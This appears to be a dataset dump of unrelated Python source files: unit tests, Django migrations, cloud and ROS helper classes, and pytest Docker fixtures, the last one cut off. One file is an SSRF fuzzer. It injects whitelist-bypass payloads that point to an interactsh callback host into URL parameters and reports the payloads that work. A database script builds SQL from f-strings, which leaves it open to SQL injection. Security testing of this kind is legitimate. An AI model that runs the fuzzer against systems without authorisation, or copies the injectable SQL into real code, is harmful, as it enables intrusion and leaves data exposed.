text
stringlengths 2
999k
|
|---|
# coding=utf-8
from smartnet.optims import *
from smartnet.layers import *
import smartnet as sn
import unittest
class OptimTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@classmethod
def setUpClass(cls):
print("optim test begins.")
@classmethod
def tearDownClass(cls):
print("optim test finished.")
@staticmethod
def test_sgd():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = SGDOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("sgd:", linear.named_parameters())
@staticmethod
def test_momentum():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = MomentumOptim(linear.named_parameters(), lr=0.001)
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("momentum:", linear.named_parameters())
@staticmethod
def test_rmsprop():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = RMSPropOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("rmsprop:", linear.named_parameters())
@staticmethod
def test_adam():
x = sn.random((30, 3))
w = sn.ones((3, 1))
y = sn.matmul(x, w)
linear = LinearLayer(3, 1, has_bias=False)
opt = AdamOptim(linear.named_parameters())
loss = MSELayer()
for i in range(1000):
opt.zero_grad()
y_hat = linear(x)
l = loss(y_hat, y)
l.backward()
opt.step()
print("adam:", linear.named_parameters())
if __name__ == "__main__":
unittest.main()
|
# Generated by Django 2.2.4 on 2019-08-03 08:31
from django.db import migrations, models
import users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0006_auto_20190803_0830'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='_image',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_image, verbose_name='image'),
),
migrations.AlterField(
model_name='customuser',
name='_image_thumb',
field=models.ImageField(blank=True, null=True, upload_to=users.models.save_thumb, verbose_name='image_thumb'),
),
]
|
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""A class for link state."""
from typing import Optional
from deepsim.core.pose import Pose
from deepsim.core.twist import Twist
from gazebo_msgs.msg import LinkState as ROSLinkState
class LinkState:
"""
LinkState class
"""
def __init__(self,
link_name: Optional[str] = None,
pose: Optional[Pose] = None,
twist: Optional[Twist] = None,
reference_frame: Optional[str] = None):
"""
Initialize LinkState class
Args:
link_name (Optional[str]): link name
pose (Optional[Pose]): desired pose in reference frame
twist (Optional[Twist]): desired twist in reference frame
reference_frame (Optional[str]): set pose/twist relative to the frame of this entity (Body/Model)
leave empty or "world" or "map" defaults to world-frame
"""
self._link_name = link_name
self._pose = pose.copy() if pose else Pose()
self._twist = twist.copy() if twist else Twist()
self._reference_frame = reference_frame or ''
@property
def link_name(self) -> str:
"""
Returns the link name
Returns:
str: link name
"""
return self._link_name
@link_name.setter
def link_name(self, value: str) -> None:
"""
Set link name
Args:
value (str): link name
"""
self._link_name = value
@property
def pose(self) -> Pose:
"""
Returns the copy of pose.
Returns:
Pose: the copy of pose of the link
"""
return self._pose.copy()
@pose.setter
def pose(self, value: Pose) -> None:
"""
Set the pose.
Args:
value (Pose): the pose
"""
self._pose = value.copy()
@property
def twist(self) -> Twist:
"""
Return the copy of twist.
Returns:
Twist: the copy of twist
"""
return self._twist.copy()
@twist.setter
def twist(self, value: Twist) -> None:
"""
Set the twist.
Args:
value (Twist): the twist
"""
self._twist = value.copy()
@property
def reference_frame(self) -> str:
"""
Returns the reference frame
Returns:
str: the reference frame
"""
return self._reference_frame
@reference_frame.setter
def reference_frame(self, value: str) -> None:
"""
Set the reference frame
Args:
value (str): the reference frame
"""
self._reference_frame = value
def to_ros(self) -> ROSLinkState:
"""
Return the ROS LinkState object created from this link state.
Returns:
gazebo_msgs.msg.LinkState: ROS LinkState
"""
ros_link_state = ROSLinkState()
if self.link_name:
ros_link_state.link_name = self.link_name
if self._pose:
ros_link_state.pose = self._pose.to_ros()
if self._twist:
ros_link_state.twist = self._twist.to_ros()
if self.reference_frame:
ros_link_state.reference_frame = self.reference_frame
return ros_link_state
@staticmethod
def from_ros(value: ROSLinkState) -> 'LinkState':
"""
Returns new LinkState object created from ROS LinkState
Args:
value (ROSLinkState): ROS LinkState
Returns:
LinkState: new LinkState object created from ROS LinkState
"""
return LinkState(link_name=value.link_name,
pose=Pose.from_ros(value.pose),
twist=Twist.from_ros(value.twist),
reference_frame=value.reference_frame)
def copy(self) -> 'LinkState':
"""
Returns a copy.
Returns:
LinkState: the copied link state
"""
return LinkState(link_name=self.link_name,
pose=self._pose,
twist=self._twist,
reference_frame=self.reference_frame)
def __eq__(self, other: 'LinkState') -> bool:
"""
Equality of LinkState.
Args:
other (LinkState): other to compare
Returns:
bool: True if the differences of all components are within epsilon, Otherwise False.
"""
return (self.link_name == other.link_name and self.reference_frame == other.reference_frame
and self._pose == other._pose and self._twist == other._twist)
def __ne__(self, other: 'LinkState') -> bool:
"""
Inequality of points is inequality of any coordinates
Args:
other (LinkState): other to compare
Returns:
bool: False if the differences of all components are within epsilon, Otherwise True.
"""
return not self.__eq__(other)
def __str__(self) -> str:
"""
String representation of a link state
Returns:
str: String representation of a link state
"""
return "(link_name=%s, pose=%s, twist=%s, reference_frame=%s)" % (self.link_name,
repr(self._pose),
repr(self._twist),
self.reference_frame)
def __repr__(self) -> str:
"""
String representation including class
Returns:
str: String representation including class
"""
return "LinkState" + str(self)
|
import regex
import argparse
import requests
import time
import os
import threading
import random
execPath = os.getcwd()
currentPath = os.path.dirname(__file__)
os.chdir(currentPath)
FUZZ_PLACE_HOLDER = '??????'
TIMEOUT_DELAY = 5
LOCK = threading.Lock()
parser = argparse.ArgumentParser()
parser.add_argument("--file", "-f", type=str, required=False, help= 'file of all URLs to be tested against SSRF')
parser.add_argument("--url", "-u", type=str, required=False, help= 'url to be tested against SSRF')
parser.add_argument("--threads", "-n", type=int, required=False, help= 'number of threads for the tool')
parser.add_argument("--output", "-o", type=str, required=False, help='output file path')
parser.add_argument("--oneshot", "-t", action='store_true', help='fuzz with only one basic payload - to be activated in case of time constraints')
parser.add_argument("--verbose", "-v", action='store_true', help='activate verbose mode')
args = parser.parse_args()
if not (args.file or args.url):
parser.error('No input selected: Please add --file or --url as arguments.')
if not os.path.isdir('output'):
os.system("mkdir output")
if not os.path.isdir('output/threadsLogs'):
os.system("mkdir output/threadsLogs")
else:
os.system("rm -r output/threadsLogs")
os.system("mkdir output/threadsLogs")
if args.output:
outputFile = open(f"{execPath}/{args.output}", "a")
else:
outputFile = open("output/ssrf-result.txt", "a")
if args.file:
allURLs = [line.replace('\n', '') for line in open(f"{execPath}/{args.file}", "r")]
regexParams = regex.compile('(?<=(access|dbg|debug|edit|grant|clone|exec|execute|load|make|modify|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|site|html|validate|domain|callback|return|host|port|to|out|view|dir|show|navigation|open|file|document|folder|pg|php_path|doc|img|filename|file_name|image)=)(.*)(?=(&|$))', flags=regex.IGNORECASE)
extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
def getFileSize(fileID):
interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
return len(interactionLogs.read())
def getInteractionServer():
id = random.randint(0, 999999)
os.system(f"interactsh-client -pi 1 &> output/threadsLogs/interaction-logs{id}.txt &")
time.sleep(2)
interactionServer = None
while not interactionServer:
interactionLogs = open(f"output/threadsLogs/interaction-logs{id}.txt", "r")
fileContent = interactionLogs.read()
pastInteractionLogsSize = len(fileContent)
interactionServer = regex.search(extractInteractionServerURL, fileContent)
time.sleep(2)
interactionServer = interactionServer.group()
return interactionServer, id
def exception_verbose_message(exceptionType):
if args.verbose:
if exceptionType == "timeout":
print("\nTimeout detected... URL skipped")
elif exceptionType == "redirects":
print("\nToo many redirects... URL skipped")
elif exceptionType == "others":
print("\nRequest error... URL skipped")
def splitURLS(threadsSize): #Multithreading
splitted = []
URLSsize = len(allURLs)
width = int(URLSsize/threadsSize)
if width == 0:
width = 1
endVal = 0
i = 0
while endVal != URLSsize:
if URLSsize <= i + 2 * width:
if len(splitted) == threadsSize - 2:
endVal = int(i + (URLSsize - i)/2)
else:
endVal = URLSsize
else:
endVal = i + width
splitted.append(allURLs[i: endVal])
i += width
return splitted
def generatePayloads(whitelistedHost, interactionHost):
generated =[
f"http://{interactionHost}",
f"//{interactionHost}",
f"http://{whitelistedHost}.{interactionHost}", # whitelisted.attacker.com
f"http://{interactionHost}?{whitelistedHost}",
f"http://{interactionHost}/{whitelistedHost}",
f"http://{interactionHost}%ff@{whitelistedHost}",
f"http://{interactionHost}%ff.{whitelistedHost}",
f"http://{whitelistedHost}%25253F@{interactionHost}",
f"http://{whitelistedHost}%253F@{interactionHost}",
f"http://{whitelistedHost}%3F@{interactionHost}",
f"http://{whitelistedHost}@{interactionHost}",
f"http://foo@{interactionHost}:80@{whitelistedHost}",
f"http://foo@{interactionHost}%20@{whitelistedHost}",
f"http://foo@{interactionHost}%09@{whitelistedHost}"
]
return generated
def smart_extract_host(url, matchedElement):
urlDecodedElem = requests.utils.unquote(matchedElement)
hostExtractorRegex = '(?<=(https|http):\/\/)(.*?)(?=\/)'
extractedHost = regex.search(hostExtractorRegex, urlDecodedElem)
if not extractedHost:
extractedHost = regex.search(hostExtractorRegex, url)
return extractedHost.group()
def prepare_url_with_regex(url):
replacedURL = regexParams.sub(FUZZ_PLACE_HOLDER, url)
matchedElem = regexParams.search(url)
if matchedElem:
matchedElem = matchedElem.group()
return replacedURL, matchedElem
def fuzz_SSRF(url, interactionServer, fileID):
pastInteractionLogsSize = getFileSize(fileID)
replacedURL, matchedElem = prepare_url_with_regex(url)
if not matchedElem: #No relevant parameter matching
return
if args.oneshot:
payloadsList = [f"http://{interactionServer}"]
else:
host = smart_extract_host(url, matchedElem)
payloadsList = generatePayloads(host, interactionServer)
if args.verbose:
if not args.threads:
print(f" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +")
print(f"\nStarting fuzzing {replacedURL}")
for payload in payloadsList:
fuzz_and_detect_with_payload("FUZZ", replacedURL, payload, fileID)
time.sleep(2)
if isInteractionDetected(pastInteractionLogsSize, fileID):
if args.verbose:
print(f"\nSSRF identified in {replacedURL}. Determining valid payload ...")
for payload in payloadsList:
if fuzz_and_detect_with_payload("DETECT", replacedURL, payload, fileID):
print(f"SSRF detected in {replacedURL} with payload {payload}.")
with LOCK:
outputFile.write(f"SSRF detected in {replacedURL} with payload {payload}\n")
return
else:
if args.verbose:
print(f"\nNothing detected for {replacedURL}")
def fuzz_and_detect_with_payload(type ,url, payload, fileID):
pastInteractionLogsSize = getFileSize(fileID)
fuzzedUrl = url.replace(FUZZ_PLACE_HOLDER, payload)
if args.verbose:
if not args.threads:
print(f"Testing payload: {payload} ", end="\r")
requests.get(fuzzedUrl, timeout=TIMEOUT_DELAY)
if type == "DETECT":
time.sleep(2)
return isInteractionDetected(pastInteractionLogsSize, fileID)
def isInteractionDetected(pastInteractionLogsSize, fileID):
currentInteractionLogsSize = getFileSize(fileID)
if currentInteractionLogsSize != pastInteractionLogsSize:
return True
return False
def sequential_url_scan(urlList):
interactionServer, fileID = getInteractionServer()
for url in urlList:
try:
fuzz_SSRF(url, interactionServer, fileID)
except requests.exceptions.Timeout:
exception_verbose_message("timeout")
except requests.exceptions.TooManyRedirects:
exception_verbose_message("redirects")
except Exception as e: #requests.exceptions.RequestException:
print(f"{url} : {e}")
exception_verbose_message("others")
def main():
if args.url:
try:
sequential_url_scan([args.url])
except Exception as e:
print("\nInvalid URL")
elif args.file:
if not args.threads or args.threads == 1:
sequential_url_scan(allURLs)
else:
workingThreads = []
split = splitURLS(args.threads)
for subList in split:
t = threading.Thread(target=sequential_url_scan, args=[subList])
t.start()
workingThreads.append(t)
for thread in workingThreads:
thread.join()
outputFile.close()
if __name__ == '__main__':
main()
|
# Generated by Django 3.1.14 on 2022-03-04 18:39
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0003_user_username'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='username',
),
]
|
# Generated by Django 3.0.11 on 2021-02-28 16:39
import django.contrib.postgres.fields.jsonb
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("bpp", "0240_auto_20210228_1739"),
("import_pracownikow", "0001_initial"),
]
operations = [
migrations.CreateModel(
name="ImportPracownikowRow",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("wiersz_xls", models.PositiveSmallIntegerField()),
(
"dane_z_xls",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True, null=True
),
),
(
"autor",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Autor"
),
),
(
"autor_jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="bpp.Autor_Jednostka",
),
),
(
"jednostka",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="bpp.Jednostka"
),
),
(
"parent",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="import_pracownikow.ImportPracownikow",
),
),
],
),
]
|
from __future__ import unicode_literals
from django.db import models
from django.utils.translation import pgettext_lazy
from django.utils.timezone import now
class ExpenseTypes(models.Model):
name = models.CharField(
pgettext_lazy('ExpenseTypes field', 'name'), unique=True, max_length=128)
description = models.TextField(
verbose_name=pgettext_lazy('ExpenseTypes field', 'description'), blank=True, null=True)
updated_at = models.DateTimeField(
pgettext_lazy('ExpenseTypes field', 'updated at'), auto_now=True, null=True)
created = models.DateTimeField(pgettext_lazy('ExpenseTypes field', 'created'),
default=now, editable=False)
class Meta:
app_label = 'expensetypes'
verbose_name = pgettext_lazy('ExpenseType model', 'ExpenseType')
verbose_name_plural = pgettext_lazy('ExpenseTypes model', 'ExpenseTypes')
def __str__(self):
return self.name
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
averageX, averageY = [float(num) for num in input().split(" ")]
CostX = 160 + 40*(averageX + averageX**2)
CostY = 128 + 40*(averageY + averageY**2)
print(round(CostX, 3))
print(round(CostY, 3))
|
# -*- coding: utf-8 -*-
import hnswlib
import numpy as np
def buildIndex(X):
dim = X.shape[1]
num_elements = X.shape[0]
data_labels = np.arange(num_elements)
p = hnswlib.Index(space = 'cosine', dim = dim)
p.init_index(max_elements = num_elements, ef_construction = 200, M = 16)
p.add_items(X, data_labels)
p.set_ef(5)
return p
def searchIndex(p, X, k=5):
labels, distances = p.knn_query(X, k = k)
return labels
|
# VMware vCloud Director Python SDK
# Copyright (c) 2014-2019 VMware, Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyvcloud.vcd.client import create_element
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.gateway import Gateway
from pyvcloud.vcd.gateway_services import GatewayServices
from pyvcloud.vcd.network_url_constants import FIREWALL_RULE_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_RULES_URL_TEMPLATE
from pyvcloud.vcd.network_url_constants import FIREWALL_URL_TEMPLATE
class FirewallRule(GatewayServices):
__SOURCE = 'source'
__DESTINATION = 'destination'
__GROUP_OBJECT_LIST = [
'securitygroup', 'ipset', 'virtualmachine', 'network'
]
__VNIC_GROUP_LIST = ['gatewayinterface']
__APPLICATION = 'application'
__SERVICE = 'service'
__PROTOCOL_LIST = ['tcp', 'udp', 'icmp', 'any']
def _build_self_href(self, rule_id):
rule_href = (
self.network_url + FIREWALL_RULE_URL_TEMPLATE).format(rule_id)
self.href = rule_href
def _extract_id(self, rule_href):
rule_id_index = rule_href.index(FIREWALL_RULES_URL_TEMPLATE) + \
len(FIREWALL_RULES_URL_TEMPLATE) + 1
return rule_href[rule_id_index:]
def __config_url(self):
config_index = self.href.index(FIREWALL_URL_TEMPLATE)
return self.href[:config_index] + FIREWALL_URL_TEMPLATE
def _reload(self):
"""Reloads the resource representation of the Firewall rule."""
self.resource = \
self.client.get_resource(self.href)
def delete(self):
"""Delete a Firewall rule from gateway."""
self._get_resource()
return self.client.delete_resource(self.href)
def edit(self,
source_values=None,
destination_values=None,
services=None,
new_name=None):
"""Edit a Firewall rule.
:param list source_values: list of source values. e.g.,
[value:value_type]
:param list destination_values: list of destination values. e.g.,
[value:value_type]
:param list services: protocol to port mapping.
e.g., [{'tcp' : {'any' : any}}]
:param str new_name: new name of the firewall rule.
"""
self._get_resource()
self.validate_types(source_values, FirewallRule.__SOURCE)
self.validate_types(destination_values, FirewallRule.__DESTINATION)
firewall_rule_temp = self.resource
if source_values:
if not hasattr(firewall_rule_temp, FirewallRule.__SOURCE):
firewall_rule_temp.append(
create_element(FirewallRule.__SOURCE))
if not hasattr(firewall_rule_temp.source, 'exclude'):
firewall_rule_temp.source.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, source_values,
FirewallRule.__SOURCE)
if destination_values:
if not hasattr(firewall_rule_temp, FirewallRule.__DESTINATION):
firewall_rule_temp.append(
create_element(FirewallRule.__DESTINATION))
if not hasattr(firewall_rule_temp.destination, 'exclude'):
firewall_rule_temp.destination.append(
create_element('exclude', False))
self._populate_objects_info(firewall_rule_temp, destination_values,
FirewallRule.__DESTINATION)
if services:
if not hasattr(firewall_rule_temp, FirewallRule.__APPLICATION):
firewall_rule_temp.append(
create_element(FirewallRule.__APPLICATION))
self._populate_services(firewall_rule_temp, services)
if new_name:
firewall_rule_temp.name = new_name
self.client.put_resource(self.href, firewall_rule_temp,
EntityType.DEFAULT_CONTENT_TYPE.value)
def _populate_services(self, firewall_rule_temp, services):
"""Populates service elements.
:param firewall_rule_temp: Firewall rule
:param [] services: protocol to port mapping.
e.g., [{'tcp' : {'any' : any}}]
"""
if services:
for service in services:
protocol = [k for k in service.keys()][0]
if protocol not in FirewallRule.__PROTOCOL_LIST:
valid_protocols = ', '.join(FirewallRule.__PROTOCOL_LIST)
raise InvalidParameterException(
protocol + " is not valid. It should be from " +
valid_protocols)
value = service.get(protocol)
source_port = [port for port in value.keys()][0]
destination_port = value.get(source_port)
self.__populate_protocol_elements(firewall_rule_temp, protocol,
source_port,
destination_port)
def __populate_protocol_elements(self, firewall_rule_temp, protocol,
source_port, destination_port):
"""Populate protocol elements. It mutates the firewall rule object.
:param firewall_rule_temp: Firewall rule obj
:param protocol: protocol
:param source_port: source port
:param destination_port: destination port
"""
application_tag = firewall_rule_temp.application
service_tag = create_element('service')
service_tag.append(create_element('protocol', protocol))
service_tag.append(create_element('port', destination_port))
service_tag.append(create_element('sourcePort', source_port))
if protocol == 'icmp':
service_tag.append(create_element('icmpType', 'any'))
application_tag.append(service_tag)
def _populate_objects_info(self, firewall_rule_temp, values, type):
"""It will mutate firewall_rule_temp.
:param firewall_rule_temp: Firewall rule object resource
:param list values: list of values
:param str type: type. e.g., source, destination
"""
for value in values:
values_arr = value.split(':')
object_type = values_arr[1]
object = values_arr[0]
if type == FirewallRule.__SOURCE:
firewall_rule_temp.source.append(
self._get_group_element(type, object_type, object))
if type == FirewallRule.__DESTINATION:
firewall_rule_temp.destination.append(
self._get_group_element(type, object_type, object))
def _get_group_element(self, type, object_type, value):
"""Get group element base upon the type and object type.
:param str type: It can be source/destination
:param str object_type: Possible values for this would be
'gatewayinterface','virtualmachine','network', 'ipset',
'securitygroup', 'ip'
:param str value: value
:return: group objectified element
:rtype: :rtype: lxml.objectify.ObjectifiedElement
"""
if object_type == 'ip':
return create_element('ipAddress', value)
if object_type in FirewallRule.__GROUP_OBJECT_LIST:
return self.__find_element(type, object_type, value,
'groupingObjectId')
elif object_type in FirewallRule.__VNIC_GROUP_LIST:
return self.__find_element(type, object_type, value, 'vnicGroupId')
def __find_element(self, type, object_type, value, group_type):
"""Find element in the properties using group type.
:param str type: It can be source/destination
:param dict object_type: object types
:param str value: value
:param str group_type: group type. e.g., groupingObjectId
"""
gateway_res = Gateway(self.client, resource=self.parent)
object_list = gateway_res.list_firewall_objects(type, object_type)
for object in object_list:
if object.get('name') == value:
properties = object.get('prop')
for prop in properties:
if prop.get('name') == group_type:
return create_element(group_type, prop.get('value'))
def validate_types(self, source_types, type):
"""Validate input param for valid type.
:param list source_types: list of value:value_type. e.g.,
ExtNw:gatewayinterface
:param str type: It can be source/destination
:raise: InvalidParameterException: exception if input param is not
valid.
"""
if source_types:
valid_type_list = [
'gatewayinterface', 'virtualmachine', 'network', 'ipset',
'securitygroup', 'ip'
]
for source_type in source_types:
if source_type.lower() == 'any':
continue
source_type_arr = source_type.split(':')
if len(source_type_arr) <= 1:
raise InvalidParameterException(
type + " type should be in the format of "
"value:value_type. for ex: "
"ExtNw:gatewayinterface")
valid_type = source_type_arr[1]
if valid_type not in valid_type_list:
valid_type_list_str = ','.join(valid_type_list)
raise InvalidParameterException(
valid_type + " param is not valid. It should be "
"from " + valid_type_list_str)
def enable_disable_firewall_rule(self, is_enabled):
"""Enabled disabled firewall rule from gateway.
:param bool is_enabled: flag to enable/disable the firewall rule.
"""
current_firewall_status = self._get_resource().enabled
if is_enabled == current_firewall_status:
return
if is_enabled:
self._get_resource().enabled = True
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
else:
self._get_resource().enabled = False
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
def info_firewall_rule(self):
"""Get the details of firewall rule.
return: Dictionary having firewall rule details.
e.g.
{'Id': 196609, 'Name': 'Test rule', 'Rule type':'user',
'Enabled':'True','Logging enabled':'True','Action':'Accept'}
:rtype: Dictionary
"""
firewall_rule_info = {}
resource = self._get_resource()
firewall_rule_info['Id'] = resource.id
firewall_rule_info['Name'] = resource.name
firewall_rule_info['Rule type'] = resource.ruleType
firewall_rule_info['Enabled'] = resource.enabled
firewall_rule_info['Logging enabled'] = resource.loggingEnabled
firewall_rule_info['Action'] = resource.action
return firewall_rule_info
def list_firewall_rule_source_destination(self, type):
"""Get the list of firewall rule source/destination.
:param str type: It can be source/destination
return: dict of firewall rule's source/destination details.
e.g.
{'exclude':'True','ipAddress':['10.112.12.12','10.232.1.2'],
'vnicGroupId':['vse','external','internal','vnic-0'],
'groupingObjectId':['1f0aab71-6d11-4567-994e-2c090fea7350:ipset',
'urn:vcloud:network:3ed60402-904f-410d-913c-6da77b43a257:']
}
:rtype: dict
"""
resource = self._get_resource()
firewall_rule_source_destination = {}
if hasattr(resource, type):
if hasattr(resource[type], 'exclude'):
firewall_rule_source_destination['exclude'] = resource[
type].exclude
if hasattr(resource[type], 'vnicGroupId'):
firewall_rule_source_destination['vnicGroupId'] = [
vnicGroupId for vnicGroupId in resource[type].vnicGroupId
]
if hasattr(resource[type], 'ipAddress'):
firewall_rule_source_destination['ipAddress'] = [
ipAddress for ipAddress in resource[type].ipAddress
]
if hasattr(resource[type], 'groupingObjectId'):
firewall_rule_source_destination['groupingObjectId'] = [
groupingObjectId
for groupingObjectId in resource[type].groupingObjectId
]
return firewall_rule_source_destination
def _build_firewall_rules_href(self):
return self.network_url + FIREWALL_URL_TEMPLATE
def update_firewall_rule_sequence(self, index):
"""Change firewall rule's sequence of gateway.
:param int index: new sequence index of firewall rule.
"""
index = int(index)
gateway_res = Gateway(self.client, resource=self.parent)
firewall_rule = gateway_res.get_firewall_rules()
resource = self._get_resource()
for rule in firewall_rule.firewallRules.firewallRule:
if rule.id == resource.id:
firewall_rule.firewallRules.remove(rule)
firewall_rule.firewallRules.insert(index, rule)
break
return self.client.put_resource(self._build_firewall_rules_href(),
firewall_rule,
EntityType.DEFAULT_CONTENT_TYPE.value)
def delete_firewall_rule_source_destination(self, value, type):
"""Delete firewall rule's source/destination value of gateway.
It will delete all source/destination value of given value.
:param str value: value to remove from source/destination.
:param str type: It can be source/destination
"""
resource = self._get_resource()
if hasattr(resource, type):
for object in resource[type].iter():
if object == value:
resource[type].remove(object)
return self.client.put_resource(self.href, resource,
EntityType.DEFAULT_CONTENT_TYPE.value)
|
import MySQLdb
from biliClass.biliAid import Aid
import time
def dblink(): # 连接数据库
# demo
return MySQLdb.connect(
host='localhost',
user='root',
passwd='password',
db='nav',
charset='utf8'
)
def dbsql(conn, sql): # 执行sql
cursor = conn.cursor()
cursor.execute(sql)
return cursor
def dbclose(cursor, conn): # 关闭sql与游标
cursor.close()
conn.commit() # 好像不用这句也行?
conn.close()
def insert(title, av_list): # 插入av用,一次性插入
conn = dblink()
sql = """INSERT IGNORE INTO `nav_bili_v`
(`id`, `av`, `bv`, `class`, `title`, `pic`, `descript`, `dynamic`, `o_name`, `o_face`, `s_view`, `s_danmaku`, `s_reply`, `s_like`, `s_coin`, `s_favorite`, `s_share`, `s_time`, `up`)
VALUES """
try:
for av in av_list:
sql += f"""(NULL, '{av}', NULL, '{title}', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),"""
sql = sql[:-1]+';' # python-str不可修改,这里是重赋值
cursor = dbsql(conn, sql)
dbclose(cursor, conn)
print('【log: 插入成功】')
except:
print('【log: 插入失败】')
def read(where=''): # 读取数据库
if(where!=''):
where = 'WHERE ' + where
conn = dblink()
sql = f"""SELECT * FROM `nav_bili_v` {where}"""
cursor = dbsql(conn, sql)
s = ''
for row in cursor.fetchall():
s = s + str(row) + '\n'
dbclose(cursor, conn)
return s
def autoUpdata(where=''):
if(where!=''):
where1 = 'WHERE ' + where
where2 = 'AND ' + where
conn = dblink()
# 第一次处理sql语句 - 读取av列表
sql_r = f"""SELECT * FROM `nav_bili_v` {where1}"""
cursor = dbsql(conn, sql_r)
av_list = cursor.fetchall()
# 仅关闭游标以更新
cursor.close()
# 第二次处理sql语句 - 爬取信息并更新列表
i = 0
for row in av_list[:]:
av = row[1]
try:
dic = Aid(av).dic
time.sleep(0.3) # 友善爬虫 && 防止被封ip
sql_u = """UPDATE `nav_bili_v` """
sql_u_temp = 'SET '
for value in dic.values():
for k,v in value.items():
sql_u_temp += f"`{k}`='{v[1]}',"
sql_u_temp = f'''{sql_u_temp[:-1]} WHERE `av`={av} {where2}'''
sql_u += sql_u_temp
cursor = dbsql(conn, sql_u)
print(f'[序列{i}] av:{av} 数据更新完毕')
except:
print(f'[序列{i}] av:{av} 数据更新失败!!!!!!!!!!!')
i+=1
print('\n数据表全部数据更新完毕')
dbclose(cursor, conn)
|
# Copyright (c) 2013 eBay Inc.
# Copyright (c) OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
QoS Specs interface.
"""
from cinderclient.v2.qos_specs import * # noqa
|
"""Unit test package for ziphyr."""
|
import os
import subprocess
import time
from contextlib import contextmanager
import grpc
import pytest
from dagster_test.dagster_core_docker_buildkite import (
build_and_tag_test_image,
test_project_docker_image,
)
from dagster import check
from dagster.grpc.client import DagsterGrpcClient
from dagster.utils import file_relative_path
IS_BUILDKITE = os.getenv('BUILDKITE') is not None
HARDCODED_PORT = 8090
@pytest.fixture(scope='session')
def dagster_docker_image():
docker_image = test_project_docker_image()
if not IS_BUILDKITE:
# Being conservative here when first introducing this. This could fail
# if the Docker daemon is not running, so for now we just skip the tests using this
# fixture if the build fails, and warn with the output from the build command
try:
build_and_tag_test_image(docker_image)
except subprocess.CalledProcessError as exc_info:
pytest.skip(
"Skipped container tests due to a failure when trying to build the image. "
"Most likely, the docker deamon is not running.\n"
"Output:\n{}".format(exc_info.output.decode())
)
return docker_image
def wait_for_connection(host, port):
retry_limit = 20
while retry_limit:
try:
if DagsterGrpcClient(host=host, port=port).ping("ready") == "ready":
return True
except grpc.RpcError:
pass
time.sleep(0.2)
retry_limit -= 1
pytest.skip(
"Skipped grpc container tests due to a failure when trying to connect to the GRPC server "
"at {host}:{port}'.format(host=host, port=port)"
)
@contextmanager
def docker_service_up(docker_compose_file, service_name):
check.str_param(service_name, 'service_name')
check.str_param(docker_compose_file, 'docker_compose_file')
check.invariant(
os.path.isfile(docker_compose_file), 'docker_compose_file must specify a valid file'
)
if not IS_BUILDKITE:
env = os.environ.copy()
env["IMAGE_NAME"] = test_project_docker_image()
try:
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'stop', service_name], env=env,
)
subprocess.check_output(
